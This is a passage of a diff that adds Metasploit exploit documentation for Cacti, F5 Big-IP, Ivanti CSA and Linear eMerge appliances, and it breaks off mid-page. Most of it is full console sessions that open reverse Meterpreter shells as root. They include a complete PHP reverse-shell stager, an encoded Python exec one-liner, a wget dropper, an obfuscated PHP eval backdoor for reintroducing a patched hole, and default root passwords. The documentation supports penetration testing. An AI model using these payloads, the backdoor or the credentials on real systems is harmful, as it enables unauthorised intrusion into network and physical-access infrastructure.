+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+
+### Cacti 1.2.22 - Linux Dropper - HOST_ID and LOCAL_DATA_ID not set (bruteforce with undetermined result, then manual exploitation)
+```
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > options 
+
+Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   HOST_ID                              no        The host_id value to use. By default, the module will try to bruteforce this.
+   LOCAL_DATA_ID                        no        The local_data_id value to use. By default, the module will try to bruteforce this.
+   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS              192.168.91.195   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT               8080             yes       The target port (TCP)
+   SRVHOST             192.168.91.195   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
+                                                  resses.
+   SRVPORT             9090             yes       The local port to listen on.
+   SSL                 false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI           /                yes       The base path to Cacti
+   URIPATH                              no        The URI to use for this exploit (default is random)
+   VHOST                                no        HTTP server virtual host
+   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.91.195   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Automatic (Linux Dropper)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > run
+
+[*] Started reverse TCP handler on 192.168.91.195:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
+[*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 500 combinations
+[*] Enumerating local_data_id values for host_id 1
+[*] Performing request 25...
+[*] Performing request 50...
+[*] Performing request 75...
+[*] Performing request 100...
+[*] Enumerating local_data_id values for host_id 2
+[*] Performing request 125...
+[*] Performing request 150...
+[*] Performing request 175...
+[*] Performing request 200...
+[*] Enumerating local_data_id values for host_id 3
+[*] Performing request 225...
+[*] Performing request 250...
+[*] Performing request 275...
+[*] Performing request 300...
+[*] Enumerating local_data_id values for host_id 4
+[*] Performing request 325...
+[*] Performing request 350...
+[*] Performing request 375...
+[*] Performing request 400...
+[*] Enumerating local_data_id values for host_id 5
+[*] Performing request 425...
+[*] Performing request 450...
+[*] Performing request 475...
+[*] Performing request 500...
+[!] Identified 15 host_id - local_data_id combination(s) that may be exploitable, but could not be positively identified as such:
+        host_id: 1 - local_data_id: 156
+        host_id: 1 - local_data_id: 157
+        host_id: 1 - local_data_id: 158
+        host_id: 1 - local_data_id: 164
+        host_id: 1 - local_data_id: 166
+        host_id: 1 - local_data_id: 167
+        host_id: 1 - local_data_id: 168
+        host_id: 1 - local_data_id: 169
+        host_id: 1 - local_data_id: 170
+        host_id: 1 - local_data_id: 173
+        host_id: 1 - local_data_id: 174
+        host_id: 1 - local_data_id: 175
+        host_id: 1 - local_data_id: 176
+        host_id: 1 - local_data_id: 177
+        host_id: 1 - local_data_id: 178
+[*] You can try to exploit these by manually configuring the HOST_ID and LOCAL_DATA_ID options
+[-] Exploit aborted due to failure: no-target: Failed to identify an exploitable host_id - local_data_id combination.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set host_id 1
+host_id => 1
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set local_data_id 156
+local_data_id => 156
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > run
+
+[*] Started reverse TCP handler on 192.168.91.195:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
+[*] Sending stage (1017704 bytes) to 10.18.0.3
+[*] Command Stager progress - 100.00% done (773/773 bytes)
+[*] Meterpreter session 2 opened (192.168.91.195:4444 -> 10.18.0.3:54964) at 2022-12-22 16:56:42 +0200
+
+meterpreter > getuid
+Server username: www-data
+```
@@ -0,0 +1,61 @@
+## Vulnerable Application
+
+The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be
+downloaded as a VMWare image for free (you have to create an account) from
+https://downloads.f5.com. You can register for a free 30-day trial if you like,
+but it's not required to test this.
+
+Boot the VM and set an admin password by logging in with the default credentials
+(admin / admin). You'll need that password.
+
+## Verification Steps
+
+1. Install the application
+2. Start `msfconsole`
+3. Do: `use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800`
+4. Do `set RHOST <target>` / `set HttpUsername admin` / `set HttpPassword <thepasswordyouchose>`
+5. Do: `run`
+6. You should get a session
+
+## Options
+
+### `HttpUsername` / `HttpPassword`
+
+The account to authorize as - requires console access. The `admin` account (which
+is the default `HttpUsername`) works great, if you have the password.
+
+## Scenarios
+
+### F5 Big-IP 17.0.0.1
+
+This should be the normal experience:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set RHOST 10.0.0.162
+RHOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set HttpPassword iagotestbigip
+HttpPassword => mybigippassword
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set VERBOSE true
+VERBOSE => true
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[*] Creating an .rpmspec file on the target...
+[*] Created spec file: /var/config/rest/node/tmp/2fadbb5d-ed94-4b23-ba57-2f0d273d2bdc.spec
+[*] Building the RPM to trigger the payload...
+[*] Sending stage (40168 bytes) to 10.0.0.162
+[+] Deleted /var/config/rest/node/tmp/2fadbb5d-ed94-4b23-ba57-2f0d273d2bdc.spec
+[+] Deleted /var/config/rest/node/tmp/RPMS/noarch/wOXt3-4.1.3-0.8.6.noarch.rpm
+[*] Meterpreter session 2 opened (10.0.0.179:4444 -> 10.0.0.162:38556) at 2022-11-14 15:14:23 -0800
+
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,217 @@
+## Vulnerable Application
+
+The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be
+downloaded as a VMWare image for free (you have to create an account) from
+https://downloads.f5.com. You can register for a free 30-day trial if you like,
+but it's not required to test this.
+
+Boot the VM and set an admin password by logging in with the default credentials
+(admin / admin). You'll need that password.
+
+## Verification Steps
+
+This is a CSRF vuln, so it requires a browser in addition to msf:
+
+1. Install the application
+2. Start `msfconsole`
+3. Do: `use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622`
+4. Do `set TARGET_HOST <target>` / `set LHOST <yourtest>`
+5. Do: `run`
+6. You should get a url such as: `http://10.0.0.179:8080/ddgjZO`
+7. Open a browser and visit that URL
+8. If you don't already have an HTTP Basic session, it'll ask for your credentials (the `admin` account from earlier works great)
+
+## Options
+
+### `TARGET_HOST` / `TARGET_URI` / `TARGET_SSL`
+
+These are the target that the user will be redirected to
+
+### `FILENAME`
+
+If the `TARGET` is `2` (`Custom`), the file that will be overwritten with the payload
+
+## Scenarios
+
+### F5 Big-IP 17.0.0.1 - Target 0 (Restart)
+
+Start the listener:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
+TARGET_HOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/LXsNzhG6zMdQ
+[*] Server started.
+```
+
+Then, a legit user that has HTTP Basic authentication (or who can be tricked
+into performing HTTP Basic authentication) needs to visit that URL. When any
+user connects, they'll be redirected to the SOAP endpoint and you'll see:
+
+```
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/LXsNzhG6zMdQ
+[*] Server started.
+
+[... wait for a user to visit the URL ...]
+
+[*] Redirecting the admin to overwrite /shared/f5_update_action; if successful, your session will come approximately 2 minutes after the target is rebooted
+```
+
+We have no way to tell whether this was successful; however, if we already have
+access to the target (ie, if you're testing this), we can check if the file was
+successfully planted:
+
+```
+[root@bigip:Active:Standalone] config # cat /shared/f5_update_action 
+UpdateAction
+https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]
+https://localhost/error
+0
+0
+0
+0
+```
+
+The code planted there will activate at reboot. So, ...wait till the target
+reboots. Perhaps when they update! Again, if you have shell access, you can
+check the log file when it boots:
+
+```
+[root@bigip:INOPERATIVE:] config # tail -f /var/log/f5_update_checker.out
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file found -- parsing
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file action: "UpdateAction"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file success URL: "https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file failure URL: "https://localhost/error"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnSuccess flag: "8"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnSuccess slot: "0"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnFailure flag: "0"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnFailure slot: "0"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: Executing EM action: UpdateAction
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: Sleeping for 2 minutes before first attempt.
+[...wait 2 minutes...]
+[Mon Nov 14 15:28:02 2022] f5em_callback [INFO]: Finished sleeping.
+[Mon Nov 14 15:28:02 2022] f5em_callback [INFO]: Attempting to connect to EM server: "https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]
+```
+
+And, on Metasploit:
+
+```
+[*] Redirecting the admin to overwrite /shared/f5_update_action; if successful, your session will come approximately 2 minutes after the target is rebooted
+[...wait 2 minutes...]
+[*] Sending stage (40164 bytes) to 10.0.0.162
+[+] Deleted /var/log/f5_update_checker.out
+[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:51388) at 2022-11-14 15:28:04 -0800
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: root
+```
+
+### F5 Big-IP 17.0.0.1 - Target 1 (Login)
+
+This works similarly.. use the module, set the `TARGET_HOST`, and set the
+`TARGET` to `1`:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
+TARGET_HOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET 1
+TARGET => 1
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/ePg5ECHuVD
+[*] Server started.
+
+[...wait for an authenticated user to click the link...]
+
+[*] Redirecting the admin to overwrite /var/run/config/timeout.sh; if successful, your session will come the next time a user logs in interactively
+```
+
+Once again, if you already have access, you can verify it worked:
+
+```
+[root@bigip:Active:Standalone] config # cat /etc/profile.d/timeout.sh 
+echo exec\(__import__\(\'base64\'\).b64decode[...]
+```
+
+Then, when a user logs in (ie, `ssh root@<target>` or on the console), you get
+a session:
+
+```
+[*] Redirecting the admin to overwrite /var/run/config/timeout.sh; if successful, your session will come the next time a user logs in interactively
+
+[...wait for a user to log in..]
+
+[*] Sending stage (40168 bytes) to 10.0.0.162
+[+] Deleted /var/run/config/timeout.sh
+[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:43902) at 2022-11-14 15:32:26 -0800
+
+meterpreter > getuid
+Server username: root
+```
+
+### F5 Big-IP 17.0.0.1 - Target 2 (Custom)
+
+Once again, set up the server:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
+TARGET_HOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET 2
+TARGET => 2
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set FILENAME /tmp/testmsfmodule
+FILENAME => /tmp/testmsfmodule
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/PLvOVjkiVvXX
+[*] Server started.
+
+[...wait for an admin to visit that link...]
+
+[*] Redirecting the admin to overwrite /tmp/testmsfmodule with the payload
+```
+
+You can verify the file exists:
+
+```
+# cat /tmp/testmsfmodule 
+echo exec\(__import__\(\'base64\'\).b64decode[...]
+```
+
+Note that while this is written by root, you're in a pretty strict SELinux
+context so most obvious attacks (like writing to /etc/profile.d, /root/.ssh,
+etc., won't work).
@@ -19,6 +19,7 @@ For testing purposes, you can download a Github Enterprise image from the follow

 This module was specifically tested against version 2.8.0, which can be downloaded here:

+Download links are provided for reference only and are not maintained by the project. Utilize at your own risk!
 [https://github-enterprise.s3.amazonaws.com/esx/releases/github-enterprise-2.8.0.ova](https://github-enterprise.s3.amazonaws.com/esx/releases/github-enterprise-2.8.0.ova)

 Before you install the image, you must have a valid key. Start from here:
@@ -0,0 +1,192 @@
+## Vulnerable Application
+
+Ivanti Cloud Services Appliance for Ivanti Endpoint Manager is a appliance that is
+designed to manage endpoints (Desktops). It also know under the name LANDESK. The
+appliance can be either a physical or a virtual appliance and it runs a web based application
+where the HTTP web interface is typically exposed to the public internet.
+
+A code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) before
+version `4.6.0-512` allows an unauthenticated user to execute arbitrary code with limited
+permissions by sending a specially crafted cookie to the client endpoint at `/client/index.php`.
+Successful exploitation results in command execution as user `nobody`. The logic of how
+the cookie is retrieved and executed is explained in more detail at
+https://attackerkb.com/assessments/d200fb32-b92f-4f69-8ae1-f6e253cf00c2 and shows how a
+encoded PHP snippet is used to determine which cookie to pass to an `eval()` statement
+that will execute arbitrary commands from the attacker as the `nobody` user.
+
+Installing a vulnerable test bed requires an Ivanti EPM Cloud Services Appliance (CSA),
+either physical or virtual with the vulnerable software installed.
+
+This module has been tested against a virtual Ivanti EPM Cloud Services Appliance (CSA)
+with the specifications listed below:
+
+* Ivanti EPM Cloud Services Appliance (CSA)
+* Version: `4.6.0-20211203.1950`
+* Remark: Manually added vulnerable code in `/opt/landesk/broker/webroot/lib/csrf-magic.php`
+
+## Verification Steps
+
+### Installation
+Below are the steps to install and setup a vulnerable Ivanti EPM Cloud Services virtual Appliance (CSA).
+
+* Download the CSA 4.6 virtual appliance
+  [ISO](https://download.ivanti.com/product/CSA/46/ldcsa-scsi-csrffix.iso) and follow the
+  instructions [on the
+  form](https://forums.ivanti.com/s/article/How-to-Create-CSA-VM-from-ISO?language=en_US).
+* Once the application has been set up, log in with the username `admin` and password
+  `admin`.
+* Follow the prompt to change the admin password.
+* Login into the appliance again with username `admin` and the password you set.
+* Add a second network interface on the VM at your hypervisor. This will allow you to run
+  and test the appliance without activation.
+* Follow the instructions on the screen to finalize the setup.
+* Start the appliance again and login with `admin` user and navigate to the security tab
+  listed on the left side of the screen.
+* Under `Trusted Services`, click the checkmarks next to `Secure Shell access` to enable
+  SSH access.
+* Login to the system via SSH with the user `admin` and the password that you set.
+* Open `/opt/landesk/broker/webroot/lib/csrf-magic.php` as the `root` user using `sudo`.
+* Just before `// Load user configuration` section in this file, add the following code
+  which will reintroduce the vulnerable code that was removed as part of the patch.
+  For more details on this, please read article [attackerkb CVE-2021-4459](https://attackerkb.com/topics/XTKrwlZd7p/cve-2021-44529).
+```
+// Obscure Tokens
+$aeym="RlKHfsByZWdfcmVwfsbGFjZShhcnJheSgnLfs1teXHc9fsXHNdLyfscsJy9fsccy8nfsKSwgYXJyfsYXkoJycsfsJysn";
+$lviw = str_replace("m","","msmtmr_mrmemplmamcme");
+$bbhj="JGMofsJGEpPjMpefsyRrPSdjMTIzJzfstlfsY2hvICc8Jy4kay4nPic7ZXfsZfshbChiYXNlNjRfZGVjb2";
+$hpbk="fsJGfsM9fsJ2NvdW50fsJzfsskYfsT0kXfs0NPT0tJRTtpZihyfsZfsXNldfsCgfskYfsSkfs9fsPSdhYicgJiYg";
+$rvom="KSwgam9pbihhcnfsJheV9zbGljZSgkYSwkYyfsgkYSktMyfskpfsKSkpOfs2VjaG8gJzwvJy4fskay4nPic7fQ==";
+$xytu = $lviw("oc", "", "ocbocaocseoc6oc4_ocdoceoccocoocdoce");
+$murp = $lviw("k","","kckrkeaktkek_kfkunkcktkikokn");
+$zmto = $murp('', $xytu($lviw("fs", "", $hpbk.$bbhj.$aeym.$rvom))); $zmto();
+```
+* Open up WireShark and then click `System` on the tabs on the left side of the screen.
+* Under `Network Settings`, click the `Save` button, then check WireShark for DNS requests to
+  `centos` related endpoints. You should see a few that are from the CSA target.
+* Save and run the Metasploit module below against the CSA target IP.
+
+1. `use exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529`
+1. `set RHOSTS <CSA target IP>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command, 1-PHP command or 2-Linux dropper>`
+1. `exploit`
+1. You should get a `bash` shell, `python` shell  or `meterpreter` session depending on the target and payload settings.
+
+## Options
+No additional options.
+
+## Scenarios
+
+### Ivanti Cloud Services Appliance RCE using payload cmd/unix/python/meterpreter/reverse_tcp
+```
+msf6 > use exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_http
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set target 0
+target => 0
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set payload cmd/unix/python/meterpreter/reverse_tcp
+payload => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set rhosts 192.168.100.41
+rhosts => 192.168.100.41
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.41:443 can be exploited.
+[+] The target is vulnerable. Version: 4.6.0-20211203.1950
+.
+[*] Executing Unix Command with echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNo9UE1LxDAQPTe/IrckGEO71K4uVhDxICKCuzeRpU1GDU3TkGS1Kv53G7I4hxnezJs3H3p0k484THKAyL+N7nnfBWhqHqI/yMijHgG9Th7PWFvsO/sGtCrZBhXRfy2+CG1uFjnQFT/i7ePN/X67e7q9fmCJJ+RkLchIKakuVqJqzkVVlmJNeL0YS5zeQzegAmYJLibxNF0EA+DoGUOmzUuJg3WdHCi5uiM8CA/ygy4Cz+ULUu0RG4Y+37UBbMBSxS7NIqdO/qunOc0QzCBpulsokNPoPIRA8wtE39QpqSAx+Q8JZBN+GfoDHtFfMQ\=\=\'\)\[0\]\)\)\) | exec $(which python || which python3 || which python2) -
+[*] Sending stage (24380 bytes) to 192.168.100.41
+[*] Meterpreter session 1 opened (192.168.100.7:4444 -> 192.168.100.41:59430) at 2023-01-08 16:43:38 +0000
+
+meterpreter > sysinfo
+Computer     : localhost.localdomain
+OS           : Linux 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > getuid
+Server username: nobody
+meterpreter >
+```
+
+### Ivanti Cloud Services Appliance RCE using payload php/meterpreter/reverse_tcp
+```
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set target 1
+target => 1
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set rhosts 192.168.100.41
+rhosts => 192.168.100.41
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.41:443 can be exploited.
+[+] The target is vulnerable. Version: 4.6.0-20211203.1950
+.
+[*] Executing PHP Command with /*<?php /**/ error_reporting(0); $ip = '192.168.100.7'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
+[*] Sending stage (39927 bytes) to 192.168.100.41
+[*] Meterpreter session 2 opened (192.168.100.7:4444 -> 192.168.100.41:59432) at 2023-01-08 16:47:23 +0000
+
+meterpreter > sysinfo
+Computer    : localhost.localdomain
+OS          : Linux localhost.localdomain 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: nobody
+meterpreter >
+```
+
+### Ivanti Cloud Services Appliance RCE using payload linux/x64/meterpreter/reverse_tcp
+```
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set target 2
+target => 2
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set rhosts 192.168.100.41
+rhosts => 192.168.100.41
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > set srvport 1080
+srvport => 1080
+msf6 exploit(linux/http/ivanti_csa_unauth_rce_cve_2021_44529) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.41:443 can be exploited.
+[+] The target is vulnerable. Version: 4.6.0-20211203.1950
+.
+[*] Executing Linux Dropper
+[*] Using URL: http://192.168.100.7:1080/oBGKBxPUe3Uos
+[*] Client 192.168.100.41 (Wget/1.14 (linux-gnu)) requested /oBGKBxPUe3Uos
+[*] Sending payload to 192.168.100.41 (Wget/1.14 (linux-gnu))
+[*] Sending stage (3045348 bytes) to 192.168.100.41
+[*] Command Stager progress - 100.00% done (119/119 bytes)
+[*] Meterpreter session 3 opened (192.168.100.7:4444 -> 192.168.100.41:59436) at 2023-01-08 16:52:10 +0000
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : localhost.localdomain
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: nobody
+meterpreter >
+```
+
+## Limitations
+Due to the port restrictions of a hardened CSA appliance typically only port `80` and `443` are open for inbound and outbound traffic.
+Also avoid using stageless payloads because they may exceed the maximum Cookie header size that will cause the payload delivery to fail.
@@ -0,0 +1,184 @@
+## Vulnerable Application
+
+Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation and personal safety systems and devices.
+The eMerge E3-Series is part of Linear’s access control platform, that delivers entry-level access control to buildings.
+It is a web based application where the HTTP web interface is typically exposed to the public internet.
+
+The Linear eMerge E3 versions `1.00-06` and below are vulnerable to unauthenticated command injection in card_scan_decoder.php
+via the  `No` and `door` HTTP GET parameter. Successful exploitation results in command execution as the root user.
+
+Building automation and access control systems are at the heart of many critical infrastructures, and their security is vital.
+Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems,
+cameras, boilers, lights, safety alarm systems within a building.
+
+This issue affects all Linear eMerge E3-Series with firmware versions up to and including `1.00-06`.
+
+Installing a vulnerable test bed requires a Linear eMerge E3-Series access controller with the vulnerable software loaded.
+
+This module has been tested against a Linear eMerge access controller with the specifications listed below:
+
+* Nortek Linear eMerge E3 Elite access controller
+* Firmware: `v1.00-03`
+
+## Verification Steps
+
+1. `use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command or 1-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+### ROOT_PASSWORD
+The password of the `root` user on the target device. Defaults to `davestyle`, which is
+the default root password for Linear eMerge E3-Series devices.
+
+## Scenarios
+
+### Nortek Linear eMerge E3 Elite access controller bash reverse shell
+
+```
+msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options
+
+Module options (exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
+                                       or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
